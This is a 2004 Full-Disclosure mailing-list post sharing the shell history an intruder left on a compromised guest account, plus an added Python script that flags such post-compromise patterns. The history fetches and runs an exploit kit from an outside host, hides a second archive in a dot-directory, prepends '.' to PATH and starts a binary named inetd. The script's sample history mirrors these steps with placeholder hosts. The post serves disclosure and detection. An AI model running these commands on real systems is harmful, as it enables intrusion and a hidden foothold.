
Re: [Full-Disclosure] Re: Automated SSH login attempts?

Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Fri, 30 Jul 2004 06:36:02 -0700
Greetings list,

Accidentally sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:


I got a similar experience from a game box I look after 
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ 
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this; if wanted,
I could grab the source IP addresses used for logging into guest, but that's
probably not overly useful.

Thanks,
Andrew Griffiths
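For anyone who ends up with a similar box, the following is an added triage helper (not code from the original post or from pulltheplug) that scans a captured .bash_history for the post-compromise pattern shown above: fetching an archive from a remote host, unpacking it and running something out of it, stashing files in a dot-directory, putting "." at the front of PATH and then launching a binary with a system-daemon name. The rule names, the daemon-name list and the sample history are constructed for this example; the hostnames in the sample are placeholders, not the hosts mentioned in the post.

```python
"""Triage helper: flag post-compromise patterns in a captured shell history.

Added example for defenders; not code from the original mailing-list post.
Rule names, the daemon-name list and the sample history are constructed here.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass

# Tools commonly used to pull a kit onto a box (constructed list).
DOWNLOADERS = {"wget", "curl", "lynx", "ftp", "ncftp", "ncftpget", "fetch"}
# Names an attacker may give a bouncer/bot so it blends into `ps` (constructed list).
DAEMON_NAMES = {"inetd", "sshd", "httpd", "crond", "syslogd", "init"}
ARCHIVE_RE = re.compile(r"\.(tgz|tar\.gz|tar\.bz2|tar|zip)\b")
HOST_RE = re.compile(r"^(\w+://)?[\w-]+(\.[\w-]+)+(/\S*)?$")   # host, host/path or URL
HIDDEN_RE = re.compile(r"^\.[^./]")                            # .name but not ./ or ../


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line in the history file
    rule: str      # short rule identifier (constructed for this example)
    command: str   # the individual command that triggered the rule


def split_commands(line: str) -> list[str]:
    """Split one history line on ';', '&&' and '||' into individual commands."""
    return [p.strip() for p in re.split(r";|&&|\|\|", line) if p.strip()]


def argv(cmd: str) -> list[str]:
    """Tokenise leniently: attacker typos (stray quotes, backticks) must not abort the scan."""
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()


def scan_history(text: str, run_window: int = 6) -> list[Finding]:
    """Return every rule hit in the history, in file order."""
    findings: list[Finding] = []
    last_extract_line: int | None = None
    path_cwd_seen = False

    for line_no, raw in enumerate(text.splitlines(), start=1):
        for cmd in split_commands(raw):
            toks = argv(cmd)
            if not toks:
                continue
            prog = toks[0].rsplit("/", 1)[-1]
            rest = " ".join(toks[1:])

            # 1. A download tool pointed at a remote host or an archive.
            if prog in DOWNLOADERS and any(HOST_RE.match(t) or ARCHIVE_RE.search(t) for t in toks[1:]):
                findings.append(Finding(line_no, "remote_fetch", cmd))

            # 2. Archive extraction; remembered so a following ./binary can be tied to it.
            if prog == "tar" and len(toks) > 1 and ("x" in toks[1] or toks[1] == "--extract"):
                last_extract_line = line_no
                if ARCHIVE_RE.search(rest):
                    findings.append(Finding(line_no, "extract_archive", cmd))

            # 3. Running something from the current directory shortly after an extract.
            if toks[0].startswith("./") and last_extract_line is not None \
                    and line_no - last_extract_line <= run_window:
                findings.append(Finding(line_no, "run_after_extract", cmd))

            # 4. Dot-prefixed directories used to hide tooling from a casual `ls`.
            if prog in {"mkdir", "cd", "mv"} and any(HIDDEN_RE.match(t) for t in toks[1:]):
                findings.append(Finding(line_no, "hidden_dir", cmd))

            # 5. PATH changed so the current directory is searched (first or at all).
            m = re.match(r"^(export\s+)?PATH=['\"]?(.*?)['\"]?$", cmd)
            if m:
                value = m.group(2)
                if value == "." or value.startswith(".:") or ":.:" in value or value.endswith(":."):
                    path_cwd_seen = True
                    findings.append(Finding(line_no, "path_includes_cwd", cmd))

            # 6. Deleting the archive once unpacked (tidy-up that hampers later forensics).
            if prog == "rm" and ARCHIVE_RE.search(rest):
                findings.append(Finding(line_no, "archive_cleanup", cmd))

            # 7. A bare daemon name run after PATH includes ".": likely a renamed bot/bouncer.
            if "/" not in toks[0] and prog in DAEMON_NAMES and path_cwd_seen:
                findings.append(Finding(line_no, "daemon_name_after_path_cwd", cmd))

    return findings


def rules_hit(findings: list[Finding]) -> set[str]:
    """Distinct rule identifiers present in a scan result."""
    return {f.rule for f in findings}


# Constructed sample history mirroring the pattern from the post (placeholder hosts).
SAMPLE_HISTORY = """\
uname -a
w
/sbin/ifconfig
wget dropzone.example.invalid/kit/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.dropzone.example.invalid
lynx
ls -alF
lynx dropzone.example.invalid/kit/bot.tgz
mkdir .drivers
mv bot.tgz .drivers
cd .drivers
tar zxvf bot.tgz
rm -rf bot.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no:>3}  {f.rule:<28} {f.command}")
```

Run it against the real file with `scan_history(open(path).read())`; the line numbers in each Finding let you line the hits up with the original history. The rules deliberately key on behaviour (fetch, unpack, run, hide, PATH tampering) rather than on the specific hostnames or archive names from the post, since those change from kit to kit while the sequence does not.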

